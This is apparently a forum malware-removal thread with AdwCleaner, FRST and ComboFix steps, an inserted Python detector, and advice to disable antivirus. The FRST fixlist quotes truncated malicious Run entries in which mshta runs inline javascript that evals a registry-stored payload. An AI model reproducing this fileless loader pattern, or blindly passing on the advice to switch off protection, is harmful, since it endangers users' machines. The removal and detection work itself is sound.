I have run Full Scan & Boot time scans. I uninstalled Internet Explorer from day one and even deleted the contents of the Internet Explorer folder mentioned in the message bar for 2 DLLs - ieproxy.dll & sqmapi.dll which I have been unable to remove even after taking ownership of them.
Would appreciate some advice on how to stop this nightmare. First time ever in many years of Avast use that I’ve encountered such an issue.
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
[*]Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
[*]Select additions at the bottom
[*]Press Scan button.
Please download AdwCleaner by Xplode onto your desktop.
[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S0].txt as well.
Hmm, the exact same infection is showing, let's try once more
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:MM6YG3zKFz="UqC9I";m8g2=new%20ActiveXObject("WScript.Shell");GGMcA9Lr="uTNbxYW";RdsV89=m8g2.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");akfWMd2lF="4xtLoV7";eval(RdsV8 (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:CY92tCCLnU="Oxlq5";k89k=new%20ActiveXObject("WScript.Shell");D1vHYMFcu="Vs";HUX4o5=k89k.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");q8CxhVuml="ox";eval(HUX4o5);WPSGc5 (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:KW3zbLY="Ecdu260TGk";c8K1=new%20ActiveXObject("WScript.Shell");VoHdg6jDS="ckvS2tBx";w1SX4s=c8K1.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");NK6ft7kv="xoUxfLX7m";eval(w1SX4s);gP22F (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters)
U3 ar5yet3c; C:\Windows\System32\Drivers\ar5yet3c.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [Amazon Music] => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] ()
DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2
DeleteKey: HKCU\software\3ba89a97d2
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
Run FRST and press Fix
On completion a log will be generated; please post that
THEN
Download and Install ComboFix
Download ComboFix from one of the following locations: Link 1 Link 2
VERY IMPORTANT !!! Save ComboFix.exe to your Desktop
IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here
[*]Double click on ComboFix.exe & follow the prompts.
[*]Accept the disclaimer and allow to update if it asks
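The Run entries targeted by the fixlist above share one pattern: mshta is started with an inline script that reads a payload from another registry value and passes it to eval. The following is an added example, not part of the thread and not FRST's own code, that flags that pattern in FRST-style log lines; the sample lines, key names and values are constructed.

```python
import re

# Constructed sample in the FRST log layout (key names and values are made up).
SAMPLE_LOG = r'''
HKLM-x32\...\Run: [**aaaa1111<*>] => mshta javascript:a="x";s=new%20ActiveXObject("WScript.Shell");p=s.RegRead("HKLM\\software\\Wow6432Node\\examplekey\\val1");eval(p); <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-0-0-0-1000\...\Run: [Music Helper] => C:\Users\demo\AppData\Local\Music\Helper.exe [5887808 2015-07-21] ()
HKLM\...\Policies\Explorer\Run: [Updater] => "C:\Windows\System32\mshta.exe" vbscript:Execute("x=1")
'''

# "<key ending in Run or RunOnce>: [<value name>] => <command>"
ENTRY = re.compile(r'^(?P<key>HK[^:]*?Run(?:Once)?): \[(?P<name>.*?)\] => (?P<cmd>.*)$')
# mshta given a script URL instead of a path to an .hta file
SCRIPT_HOST = re.compile(r'\bmshta(?:\.exe)?"?\s+"?(?:javascript|vbscript):', re.I)
REGREAD = re.compile(r'RegRead\("([^"]+)"\)', re.I)


def analyze(line):
    """Return findings for one autorun line, or None if it is not a Run entry."""
    m = ENTRY.match(line.strip())
    if not m:
        return None
    cmd, reasons = m["cmd"], []
    if SCRIPT_HOST.search(cmd):
        reasons.append("mshta runs inline script")
    if re.search(r"\beval\(", cmd, re.I):
        reasons.append("eval of data")
    # RegRead takes key\value; the parent key is where the payload is stored.
    values = [v.replace("\\\\", "\\") for v in REGREAD.findall(cmd)]
    keys = [v.rsplit("\\", 1)[0] for v in values]
    if keys:
        reasons.append("payload read from registry")
    if "Value Name with invalid characters" in cmd or not m["name"].isprintable():
        reasons.append("unprintable value name")
    return {"key": m["key"], "name": m["name"], "reasons": reasons, "payload_keys": keys}


def suspicious(log):
    """All Run entries in the log with at least one finding."""
    return [r for r in map(analyze, log.splitlines()) if r and r["reasons"]]


if __name__ == "__main__":
    for hit in suspicious(SAMPLE_LOG):
        print(hit["key"], hit["name"], hit["reasons"], hit["payload_keys"])
```

The `payload_keys` output corresponds to the kind of key the `DeleteKey:` lines in the fixlist remove, so it gives a reviewer the second location to check alongside the Run value itself.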
Followed the instructions to the letter. Did a FRST scan and log file attached. Then ran ComboFix, which scanned and then rebooted after completion. On returning to the Desktop another window opened and started to create a log file; unfortunately it came up with an error because of disk error, damaged or something like that. I was unable to take a screenshot because my was sort of frozen and had to reboot once more. I’ve only had one pop up for the last hour or so.
[*]If malicious objects are found, they will show in the Scan results and offer three (3) options.
[*]Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.
Sorry for the delay. I checked the services and Windows Defender was active so I switched it off, ran AdwCleaner followed by ComboFix and after the reboots no more pop ups. All going well for a number of hours.